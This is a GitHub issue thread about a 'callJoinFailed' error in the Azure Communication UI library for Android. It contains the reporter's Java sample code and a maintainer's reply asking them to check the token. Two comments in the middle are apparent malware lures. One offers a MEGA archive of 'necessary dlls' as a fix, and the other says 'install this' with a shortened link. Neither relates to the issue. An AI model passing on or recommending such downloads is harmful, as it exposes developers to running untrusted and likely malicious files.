### ISSUE TITLE
["1.10.0"] Getting callJoinFailed with Getting-Started Code

### ISSUE THREAD

**Issue by TIMBLOCKER** [Azure/communication-ui-library-android#1087]
**Describe the bug**
We wanted to get started with the Android-Teams implementation and tried to insert the getting started code into a blank android app. Unfortunately we got the error callJoinFailed without any more information. The app showed us the join screen an then closed the screen after trying to connect to the meeting. We were able to reproduce the error on multiple devices with multiple meetings and  tokens. We hope you can help us getting things sorted out.

**To Reproduce**
Use the following code in the MainActivity:
```import androidx.appcompat.app.AppCompatActivity;
import android.os.Bundle;
import android.util.Log;
import android.widget.Button;
import com.azure.android.communication.common.CommunicationTokenCredential;
import com.azure.android.communication.common.CommunicationTokenRefreshOptions;
import com.azure.android.communication.ui.calling.CallComposite;
import com.azure.android.communication.ui.calling.CallCompositeBuilder;
import com.azure.android.communication.ui.calling.models.CallCompositeJoinLocator;
import com.azure.android.communication.ui.calling.models.CallCompositeLocalOptions;
import com.azure.android.communication.ui.calling.models.CallCompositeTeamsMeetingIdLocator;
import com.azure.android.communication.ui.calling.models.CallCompositeTeamsMeetingLinkLocator;

public class MainActivity extends AppCompatActivity {
    
 @Override
    protected void onCreate(Bundle savedInstanceState) {
        uper.onCreate(savedInstanceState);
       setContentView(R.layout.activity_main);

        Button startButton = findViewById(R.id.startButton);

        startButton.setOnClickListener(l -> {
            startCallComposite();
        });
    }

    private void startCallComposite() {
        CommunicationTokenRefreshOptions communicationTokenRefreshOptions =
                new CommunicationTokenRefreshOptions(() -> fetchToken(), true);

        CommunicationTokenCredential communicationTokenCredential =
                new CommunicationTokenCredential(communicationTokenRefreshOptions);

        CallCompositeJoinLocator locator = new CallCompositeTeamsMeetingIdLocator("941 720 796 228 1", "drjeh2");

        //Just to show that it didn't work without the Join-Screen either
        final CallCompositeLocalOptions localOptions = new CallCompositeLocalOptions()
                .setMicrophoneOn(true)
                .setCameraOn(true)
                .setSkipSetupScreen(true); //enable startup screen by setting this to true



        CallComposite callComposite = new CallCompositeBuilder()
                .applicationContext(this.getApplicationContext())
                .credential(communicationTokenCredential)
                .displayName("DISPLAY_NAME").build();

        callComposite.addOnErrorEventHandler(callCompositeErrorEvent -> {
            Log.e("TEAMSLIB", "ERROR: "+ callCompositeErrorEvent.getErrorCode());
        });

        callComposite.launch(this, locator, localOptions);
    }

    private String fetchToken() {
        return "TOKEN";
    }
}
```

**Expected behavior**
When entering the meeting we want to be able to connect and normally talk with the meeting particitpants. Sadly we are not even able to join due to the error.

**Screenshots**
Error Message:
![image](https://github.com/user-attachments/assets/bb5fdf01-8d9e-42a1-a35b-10d8e8e93c6f)
Screenshot of Error Message if Setup Screen is enabled:
![Screenshot_20240919_120916_TeamsTester](https://github.com/user-attachments/assets/423702c4-e8c4-4e92-a01f-1d6e95c2c929)

**AzureCommunicationUILibrary (please complete the following information):**
 - Version [1.10.0]

**Smartphone (please complete the following information):**
 - Device: [Samsung Galaxy S23]
 - API: [API 34]

**Call Logs**
All logs we got were the message "callJoinFailed" when enabling the error listener.

**Additional context**
We really did try to follow the steps of the library getting started page. It seems like we did excactly the same as in the documentation but still got the error. I hope you can support us in implementing the feature and getting rid of the aforementioned error.

**Comment by nhatlaso1** [comment]
This might help:This file might fix it
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
I put the necessary dlls in the archive

**Comment by nnimoyoefoki** [comment]
install this
https://bit.ly/3XQLHlH

you may need to install the c compiler

**Comment by pavelprystinka** [comment]
Hi @TIMBLOCKER,

Thank you for such detailed descriptions.
I have tested your code by just copy/past it and putting my token and it works fine for me.
Could you please make sure you have a valid token.

Thank you.

**Comment by TIMBLOCKER** [comment]
Hi @pavelprystinka,
thank you for your quick reply. To circumvent any problems with the token I creatd a new Azure Account and tried to create a new "Communication Service" instance just like it is described [here](https://learn.microsoft.com/en-us/azure/communication-services/quickstarts/create-communication-resource?tabs=windows&pivots=platform-azp) and created a new access token like [here](https://learn.microsoft.com/en-us/azure/communication-services/quickstarts/identity/access-tokens?tabs=windows&pivots=platform-azportal).

In the end I got an instance of the service with the following properties:

![image](https://github.com/user-attachments/assets/aa4c578d-7bb0-475f-accf-b91c2c3d28b9)

After that I added a token for the instance:

![image](https://github.com/user-attachments/assets/81b7cf4c-c1b4-43b1-99c4-c91ee441c3eb)
and added the token in the  "TOKEN" field in the code.

Do I miss something here? I can not imagine any circumstance that it should not work with my token, but work fine with yours?
Is there any possibilty that the token process and the service should not work with an Azure Student licence?

Thanks for helping!
